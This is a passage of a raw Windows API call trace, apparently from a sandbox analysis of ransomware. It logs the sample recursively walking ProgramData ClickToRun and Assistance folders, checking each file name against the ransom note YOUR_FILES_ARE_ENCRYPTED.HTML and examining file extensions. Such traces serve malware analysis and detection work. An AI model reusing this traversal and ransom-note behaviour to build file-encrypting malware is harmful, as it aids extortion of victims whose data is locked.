lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.567] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0169.567] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.567] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.567] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.567] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0169.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.567] GetProcessHeap () returned 0x270000 [0169.569] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x749a470 | out: hHeap=0x270000) returned 1 [0169.580] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacf78e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.580] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.580] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.580] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacf78e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.580] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.580] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\assistance\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.580] GetProcessHeap () returned 0x270000 [0169.581] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.583] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcba0f1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba0f1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0169.583] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun") returned 43 [0169.583] GetProcessHeap () returned 0x270000 [0169.583] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.585] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun" [0169.585] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*" [0169.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcba0f1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba0f1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.585] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcba0f1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba0f1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.585] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="5DF8E020-832F-493E-A40D-17A803C0D548", cAlternateFileName="5DF8E0~1")) returned 1 [0169.585] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548") returned 80 [0169.585] GetProcessHeap () returned 0x270000 [0169.585] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.588] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548" [0169.588] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*" [0169.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.588] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.589] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0169.589] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16") returned 89 [0169.589] GetProcessHeap () returned 0x270000 [0169.589] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.590] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16" [0169.590] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*" [0169.590] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.590] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.591] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcad43ba0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5765, dwReserved0=0x0, dwReserved1=0x60, cFileName="MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D", cAlternateFileName="MASTER~1.7F1")) returned 1 [0169.591] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D") returned 181 [0169.591] lstrcmpW (lpString1="MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.591] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D") returned=".7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D" [0169.591] lstrlenW (lpString=".7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D") returned 65 [0169.591] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x60, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1 [0169.591] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\s321033.hash") returned 102 [0169.591] lstrcmpW (lpString1="s321033.hash", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.591] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0169.591] lstrlenW (lpString=".hash") returned 5 [0169.591] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0169.591] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26", cAlternateFileName="STREAM~1.95A")) returned 1 [0169.591] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26") returned 179 [0169.591] lstrcmpW (lpString1="stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.591] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26") returned=".95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26" [0169.591] lstrlenW (lpString=".95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26") returned 65 [0169.591] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcad8fe60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.591] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.591] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.592] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcad8fe60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.592] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.592] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\en-us.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.592] GetProcessHeap () returned 0x270000 [0169.593] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.593] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0169.593] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16") returned 90 [0169.593] GetProcessHeap () returned 0x270000 [0169.593] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.593] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16" [0169.593] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*" [0169.593] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.593] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.593] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcadb5fc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5220, dwReserved0=0x0, dwReserved1=0x60, cFileName="MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05", cAlternateFileName="MASTER~1.75D")) returned 1 [0169.593] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05") returned 183 [0169.593] lstrcmpW (lpString1="MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.593] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05") returned=".75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05" [0169.593] lstrlenW (lpString=".75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05") returned 65 [0169.593] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x60, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1 [0169.593] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\s320.hash") returned 100 [0169.594] lstrcmpW (lpString1="s320.hash", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.594] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0169.594] lstrlenW (lpString=".hash") returned 5 [0169.594] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0169.594] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcaddc120, 